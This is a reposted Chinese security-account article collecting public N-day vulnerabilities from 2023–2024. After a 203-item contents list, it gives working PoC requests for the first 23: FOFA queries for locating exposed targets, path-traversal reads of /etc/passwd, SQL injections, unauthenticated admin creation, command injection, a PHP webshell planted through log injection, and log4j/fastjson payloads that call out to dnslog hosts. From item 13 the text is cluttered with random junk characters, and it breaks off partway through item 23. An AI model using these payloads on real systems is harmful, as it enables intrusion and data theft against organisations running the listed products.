Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界; author: 网络安全新视界.

Purpose: Exploitation of N-day vulnerabilities makes up a large share of attack activity in offensive and defensive exercises; we hope this article helps defenders. Defensive teams can use its contents to check their own exposure.

Sources: This article covers 203 PoCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites on the Internet and compiled for publication by the 网络安全新视界 team.

Patches: All vulnerabilities listed are already public; for patches or remediation guidance, contact the product vendor.

Content: Because of length limits, a few PoCs that are too long are replaced with the word PAYLOAD; search for the full PoC yourself if you need it.

Legal rights: If any content infringes the legitimate rights of any party, contact the 网络安全新视界 team through the account backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the complete version; when using it, press F12 and search for keywords.

Bookmark this article if you find it useful, or follow the official account (网络安全新视界).

Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE traffic control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese Tosei self-service laundry machine RCE
87. DBAPPSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing 百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. Beijing 百绰智能 S20 backend sysmanageajax.php SQL injection
120. Beijing 百绰智能 S40 management platform import web.php arbitrary file upload
121. Beijing 百绰智能 S42 management platform userattestation.php arbitrary file upload
122. Beijing 百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian 科立讯 communication command and dispatch platform down_file.php SQL injection
138. Fujian 科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. Fujian 科立讯 communication command and dispatch platform editemedia.php SQL injection
140. Fujian 科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. Fujian 科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle tracking and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou 图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 hash of the password you choose.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the backend with the default account admin, send the following request:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword
Host: x.x.x.x

The payload is the double URL-encoded form of the following statement:
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request; the injected code executes the command supplied in a request header after base64-decoding it.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Step 3: send the following request to the lab target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown任意文件读取) z+ x3 s3 }" _) i: H1 o- X2 H% B
FOFA:app="红帆-ioffice"
8 n0 }4 G/ C/ S+ ~GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1" h& ~# M$ v' _0 p+ n& D( Y
Host: x.x.x.x& X5 u; [ W4 o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36! x; ~% u# ~+ z
Connection: close5 ~! A8 u/ Y) t: p U) L
Accept: */*
. H" V: K( C! h0 rAccept-Encoding: gzip
# J O" a" O- c9 k" m# t4 D3 Q4 b8 V$ O0 e7 ?; T l& K# j) p
/ p2 N; k, g: ]14. 华夏ERP(jshERP)敏感信息泄露
3 J% G* o7 n J2 V- U6 fFOFA:body="jshERP-boot"
# x8 @- b" E9 P& n: c3 y泄露内容包括用户名密码7 e$ v- l/ }. D6 m7 H" T
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1$ ?: d/ F! O+ @/ H* @0 P% T
Host: x.x.x.x
& G# T. D& _+ l! P5 L- h! fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
6 H: a1 H6 U4 l' }8 R2 {Connection: close
7 H8 j* H; j; N1 f1 J5 PAccept: */** _+ R4 q N! u0 k+ l P1 Q) j
Accept-Language: en4 {* i+ T) x) {8 }& J F/ H3 L
Accept-Encoding: gzip
1 D) Y9 l2 J( N; p) }+ Y* N* d
0 O5 f9 s7 |4 R/ }8 M1 T& j9 c, Y& r4 \
15. 华夏ERP getAllList信息泄露9 S* M: o7 r5 u. B4 X; d
CVE-2024-04909 I7 F+ k0 }$ P
FOFA:body="jshERP-boot"
/ n" [" D; x/ W7 G( u( m* \泄露内容包括用户名密码
) `5 Q% A0 {/ x( u5 V4 ]GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
: Z! [1 e$ w" ?5 |# ]Host: 192.168.40.130:100+ |- i* A3 s6 J9 G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
: ~. N1 _0 b* z* X5 V: ]Connection: close
8 P1 s6 ^5 L8 L* ~# LAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
! [2 z7 @& j# S$ G* JAccept-Language: en: l8 F' E( M; E
sec-ch-ua-platform: Windows
) }- }8 b4 ?' c( \" i( W; I) G2 aAccept-Encoding: gzip# Q: a6 B( ^3 Q& p! d' L
4 R( {: B5 W1 e: I) B
. L1 v3 F, U9 e4 F16. 红帆HFOffice医微云SQL注入
& n! t: B9 Z! F- S" KFOFA:title="HFOffice"7 a: U# z/ b+ T: p% _$ A3 B i/ ^4 c
poc中调用函数计算1234的md5值# C4 d; o3 {4 C; { `5 E0 t
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.14 H- n9 r) n& X9 Y- A6 n, _1 C+ E; ~4 S! m
Host: x.x.x.x. g& v& w P2 E( x2 ^8 S& x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
0 S6 _( C4 Q2 |' H9 IConnection: close
2 o4 G' ?9 G9 p8 z* n9 _Accept: */*0 x4 U }' F* D- j: K
Accept-Language: en
/ w8 U/ U2 `5 q+ wAccept-Encoding: gzip, Y* Q$ T2 o2 v8 K# F+ ~
' y# i4 e/ r2 _% I. p$ m' `4 _# C: J7 P+ j k% h5 Y" j+ o
17. 大华 DSS itcBulletin SQL 注入
" c2 q: s! v6 ]3 }* _7 a9 BFOFA:app="dahua-DSS"
' P; m9 P- H' @POST /portal/services/itcBulletin?wsdl HTTP/1.1* ^! v. x( m& D4 Q/ ^/ [3 K- }
Host: x.x.x.x
( _& R3 g& f) C6 s4 b2 W- qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 ^ H9 ~, ?9 {4 i4 |- KConnection: close
8 G5 w; E, ]+ m! Y5 s0 G, DContent-Length: 345
5 j9 q# M0 F2 k" JAccept-Encoding: gzip
: i5 i2 B y* A! T! `
$ g0 X/ V5 W. ^<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
: i- \3 f2 ]) l: \& B, c<s11:Body>
$ o! M+ ^, Y9 A( G( R% b <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
* b7 {& y$ g" T5 J6 L, e3 W& G! D <netMarkings>
0 E8 T" G8 @6 a( d4 {% b8 t, c; t) F8 t (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
7 S$ Q: V9 ]% Z& r+ w1 N" J! Z </netMarkings>1 U* L h% t+ f8 Z, ~; i2 R4 t( L
</ns1:deleteBulletin>
3 _! ~8 M; V( U% k& W% f9 f </s11:Body>6 e; O0 }* |6 v! |, J
</s11:Envelope>; D; q! r4 j+ ?: B" j. {$ m4 f
: g W4 H0 Q9 S: V
$ D: E- W2 N3 F- d d7 l18. 大华 DSS 数字监控系统 user_edit.action 信息泄露2 D9 C: W9 b) v
FOFA:app="dahua-DSS"
+ w4 K; M C0 QGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
7 y$ z9 `$ o/ Q& HHost: your-ip" \3 R/ ~( F1 r# L, P& d Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ |8 ~4 S9 ?3 z- O6 FAccept-Encoding: gzip, deflate
2 u# q# o/ [' e2 P% Y. k- {0 V# `Accept: */*, b- S) ]4 X2 X! U4 h9 U
Connection: keep-alive' _, e1 a* @, J$ ]9 r
; L" E( o- `& p- O9 g
1 M, r3 R) j6 s' ~. S6 v( Q: H6 ]( D! U4 Z8 K
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入* E5 u+ G" I/ j# A6 r% X+ n- l
FOFA:app="dahua-DSS"
& D- O- ?7 i0 I) b: ?GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.12 M# G* x a* E1 a7 ^$ {
Host:( r# U8 {# ?* t' O
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ p1 j v4 a4 I# n& u7 L7 P& ZAccept-Encoding: gzip, deflate/ O; [' ^+ J# l0 p& @( ~
Accept: */*
0 x. A3 u& L7 d7 T- M, n& Z: GConnection: keep-alive6 k) f+ [3 w4 E/ U
) g- c! V4 Y: E+ n
0 q; L% j5 L, {. i
20. 大华ICC智能物联综合管理平台任意文件读取; w/ j# R3 j' p5 ]
FOFA:body="*客户端会小于800*"# z8 w2 u/ a; G
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.17 @( f8 P( Q6 \- L9 O$ N1 f; Y; a
Host: x.x.x.x
1 F. f9 M1 g aUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 O0 u9 x, P& e4 h3 ]3 I4 S. ^
Connection: close
2 b2 Y) z' W: e, o8 @0 f5 B3 zAccept: */*6 A" {# B, f$ K- M% _
Accept-Language: en5 i4 C1 _* g/ i8 C0 s4 \# ]: O
Accept-Encoding: gzip( C" s+ t5 x2 W3 e+ }* _
, J) `9 {+ J0 ?& y3 r' y
4 a! A' e4 \2 e
21. 大华ICC智能物联综合管理平台random远程代码执行
0 }0 U' b) g3 @FOFA:icon_hash="-1935899595"
4 u1 g2 }5 e; y+ y' Y M4 U+ ] f" GPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1! S& O9 D z5 c* ]
Host: x.x.x.x
& t0 M$ A3 g! X5 K# \9 p, OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( |" g2 g7 M b! Y, RContent-Length: 161
9 x9 c- _6 e9 T% q% HAccept-Encoding: gzip2 h% V6 [7 s7 b7 p' R5 y
Connection: close! A# ~% y7 U) i5 E+ G
Content-Type: application/json;charset=utf-8
; r5 a- C/ [# \3 Y3 G: p
9 W5 d- @/ Z8 \2 d{; {' X! U+ a3 f4 p/ _1 x: u
"a":{0 y3 |$ P1 F2 A4 K0 G$ n5 P
"@type":"com.alibaba.fastjson.JSONObject",9 B4 }' n( I. r4 D. c- M4 L
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}2 ` `0 u" r! x, U9 N& W# t
}""0 ^: {9 z" O- [1 x
}
0 B3 q% Z/ C! S0 J* c3 h; }; P0 a4 Q4 ]
6 |5 f" @" @) t( r) ]7 ^! D& {- C# b9 j5 O+ v5 [
22. 大华ICC智能物联综合管理平台 log4j远程代码执行+ l T5 b; z- E4 |2 s6 Z
FOFA:icon_hash="-1935899595"7 y2 ~2 I1 L/ V7 e
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.19 Y3 `) @. A0 U; R6 e' C
Host: your-ip" K( u+ k/ w- L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 h8 c& }1 ]; i* A, `0 K3 |& Q
Content-Type: application/json;charset=utf-8. K! j. ~* u$ L2 I `* z' L, u
- X3 E5 ^, E" m3 O/ i7 {5 k
{9 J/ u* n6 d- C) ?# o2 e0 p* F4 m1 M
"loginName":"${jndi:ldap://dnslog}"
+ L, s4 C) M9 m9 O9 n- T) M. A}- p* {# O* O F6 M% R/ J7 J& t0 |
/ Q5 @, _) `% R+ i& F, _ p% D7 |* X$ a' [. }: n
- l- S6 W. `. h/ r* g. D
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
$ \& E+ d' e. h/ nFOFA:icon_hash="-1935899595"
) {' O( p8 @6 S6 l: APOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
3 P9 i3 I) A' u- K1 bHost: your-ip
0 h& G$ f7 Z: E% o" @3 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, A4 }6 X, t0 C" Z6 ]9 G, I
Content-Type: application/json;charset=utf-8
, ]" }7 Y/ ^; E, ]) B. f/ w2 |Accept-Encoding: gzip
: Q U O/ o" s8 u1 z5 \ x- U; vConnection: close
